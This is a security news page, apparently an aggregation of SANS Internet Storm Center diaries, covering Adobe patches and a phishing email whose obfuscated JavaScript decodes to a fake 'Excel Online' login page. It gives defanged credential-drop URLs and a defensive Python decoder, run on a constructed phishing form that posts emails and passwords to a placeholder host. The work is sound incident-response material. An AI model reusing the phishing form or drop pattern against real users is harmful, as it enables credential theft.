(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
 

Anonymous' Op Icarus: Cyberattacks on Banks Around the World
SYS-CON Media (press release)
As part of its mission to share and analyze information security news, Peerlyst (https://www.peerlyst.com) has published a blog that discusses the recent wave of distributed denial of service (DDoS) attacks that Anonymous has used to take out central ...

 
 
[security bulletin] HPSBGN03597 rev.1 - HPE Cloud Optimizer (Virtualization Performance Viewer) using glibc Remote Denial of Service (DoS)
 
The National Institute of Standards and Technology (NIST) is offering up to $1 million in grants to establish up to eight Regional Alliances and Multistakeholder Partnerships to Stimulate (RAMPS) cybersecurity education and workforce ...
 

SANS Announces Agenda for Annual DFIR Summit in Austin, Texas
SYS-CON Media (press release)
BETHESDA, Md., May 12, 2016 /PRNewswire-USNewswire/ -- SANS Institute, the global leader in information security training, today announced the agenda for its annual Digital Forensics & Incident Response (DFIR) Summit and Training to be held June 23 ...

 

As expected, Adobe released today updated versions of:

  • Flash Player (v21.0.0.242)
  • Flash Player ESR (v18.0.0.352)
  • AIR (v21.0.0.215)
  • Flash Player Linux (v12.2.202.621)

They are related to CVE-2016-4117. Windows, OS X, Linux and ChromeOS are affected but the patch is currently only available for Windows. Patch as soon as possible because the vulnerability is actively exploited in the wild.

Details: https://helpx.adobe.com/security/products/flash-player/apsa16-02.html

They also released new updated versions of:

  • Acrobat Reader (v11.0.16)
  • Acrobat Reader DC (v2015.016.20039)

Details: https://helpx.adobe.com/security/products/acrobat/apsb16-14.html

Finally, ColdFusion also got a patch: https://helpx.adobe.com/security/products/coldfusion/apsb16-16.html

Xavier Mertens
ISC Handler - Freelance Security Consultant
PGP Key

 

 

Lie back and think of cybersecurity: IBM lets students loose on Watson
The Register
That's because the infosec (sorry cyber security) biz is guilty of re-appropriating military terms such as APT en masse. IBM said collaborating with eight universities that have “some of the world's best cybersecurity programs” will help “further train ...

 

I'm collecting a lot of phishing samples every day and most of them are part of big waves of spam... Millions of messages are sent with the hope that at least some victims will fall into the trap. And sometimes, you find a nice (different) one like yesterday. It was a classic email with the subject "Important Notice". Its payload was a single call to document.write(unescape(...)) with a long percent-encoded string as the argument; once decoded, the string is a complete HTML page (its title reads "Excel Online").

It is not complicated to de-obfuscate this payload (the code is available here). The attacker generated a page with an online HTML editor and added a form to capture credentials.

The HTML objects are downloaded from hxxp://tourkrabithailand.com/images/services/gr/ and credentials are posted to hxxp://mat-update.be/money/result.php. I contacted the Belgian CERT yesterday to report this website and the domain is already blocked.

Nothing fancy, bad design (why a blue Download button?) but it works! The JavaScript code runs below the radar with a low VT detection rate: 2/56 (link).
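A small decoder for this kind of document.write(unescape(...)) payload, added here as an example (it is not the diary's own code nor the script linked above): it mimics JavaScript's unescape(), pulls the decoded HTML out of the script, and reports the page title, the form action and any external resources, defanged the way the diary writes them. The sample it runs on is constructed, with placeholder example.invalid hostnames.

```python
import re
from urllib.parse import quote

# Constructed sample: a small stand-in for the real attachment, built by
# percent-encoding an HTML page the same way the attacker's generator did.
FAKE_PAGE = (
    '<!doctype html>\r\n<html>\r\n<head>\r\n<meta charset="utf-8">\r\n'
    '<title>Excel Online</title>\r\n</head>\r\n<body>\r\n'
    '<form method="post" action="http://phish.example.invalid/result.php">\r\n'
    '<input name="email"><input type="password" name="pass">\r\n'
    '<input type="submit" value="Download">\r\n</form>\r\n'
    '<img src="http://cdn.example.invalid/images/gr/logo.png">\r\n'
    '</body>\r\n</html>'
)
SAMPLE = '<script>document.write(unescape("' + quote(FAKE_PAGE, safe="") + '"))</script>'

WRITE_RE = re.compile(
    r'document\.write\s*\(\s*unescape\s*\(\s*(["\'])(.*?)\1\s*\)\s*\)', re.S)


def js_unescape(s):
    """Behave like JavaScript's unescape(): %uXXXX is a UTF-16 code unit,
    %XX is a single Latin-1 code point (not UTF-8), anything else is kept."""
    return re.sub(r'%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})',
                  lambda m: chr(int(m.group(1) or m.group(2), 16)), s)


def deobfuscate(script):
    """Return the decoded HTML of every document.write(unescape("...")) call."""
    return [js_unescape(m.group(2)) for m in WRITE_RE.finditer(script)]


def defang(url):
    """Write URLs as hxxp:// so a report cannot be clicked by accident."""
    return url.replace("http", "hxxp", 1)


def analyze(script):
    """Summarise what the decoded page(s) do: title, where the form posts,
    and which external hosts serve the page's images/scripts/styles."""
    report = {"titles": [], "form_actions": [], "external_resources": []}
    for html in deobfuscate(script):
        report["titles"] += re.findall(r'<title>(.*?)</title>', html, re.I | re.S)
        report["form_actions"] += [defang(u) for u in re.findall(
            r'<form[^>]*\baction=["\']([^"\']+)', html, re.I)]
        report["external_resources"] += [defang(u) for u in re.findall(
            r'\b(?:src|href)=["\'](https?://[^"\']+)', html, re.I)]
    return report
```

The same two-step pattern (decode, then extract indicators) is what you want in a triage script: the form action is the credential drop point to report, and the resource hosts show where the page's assets are staged.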

Xavier Mertens
ISC Handler - Freelance Security Consultant
PGP Key


 
[slackware-security] mozilla-thunderbird (SSA:2016-132-01)
 
[security bulletin] HPSBST03599 rev.1 - HPE 3PAR OS running OpenSSH, Remote Denial of Service (DoS), Access Restriction Bypass
 
[security bulletin] HPSBST03598 rev.1 - HPE 3PAR OS using glibc, Remote Denial of Service (DoS), Arbitrary Code Execution
 
[security bulletin] HPSBST03586 rev.1 - HPE 3PAR OS, Remote Unauthorized Modification
 
Re: [slackware-security] imagemagick (SSA:2016-132-01)
 